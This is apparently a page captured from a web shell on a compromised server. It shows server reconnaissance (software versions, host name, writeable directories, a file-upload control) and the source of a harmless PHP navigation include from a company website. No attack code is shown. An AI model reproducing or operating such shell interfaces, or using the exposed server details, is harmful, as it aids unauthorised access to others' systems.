KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/gwsolutions/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/gwsolutions/includes/news_index.php
<?php
$file = basename($_SERVER['REQUEST_URI']); 

?>

<!-- benchmarking index -->
<div class="col-md-4 col-md-pull-8">
	<div class="list-group"> 
		<?php
			for ($i = 0; $i < count($news,2); $i++) {
				echo '<a href="'.$news[$i][1].'" class="list-group-item ';
				if ($file == $news[$i][1])	echo 'active';
				echo '">'.$news[$i][0].'</a>';
				
			
			}
		// output is like this:  <a href="services.php" class="list-group-item active"> Overview </a> 
		// or for non active  :  <a href="services.php" class="list-group-item"> Overview </a> 
		
		?>
		
      <h3 class="style127"><span class="style131"> &nbsp;Media Contact:</span></h3>
	  <a href="mailto: [email protected]" class="style143">&nbsp;[email protected]</a>
	  <p class="style127">&nbsp;Global Wireless Solutions, Inc. <br>
		&nbsp;23475 Rock Haven Way, #165 <br>
		&nbsp;Dulles, VA 20166 </p>
	  <p class="style127">&nbsp;Tel: (703) 661 7000 <br>
		&nbsp;Fax: (703) 661 7001</p>
	</div>
</div>
<!-- end of benchmarking index -->

Anon7 - 2021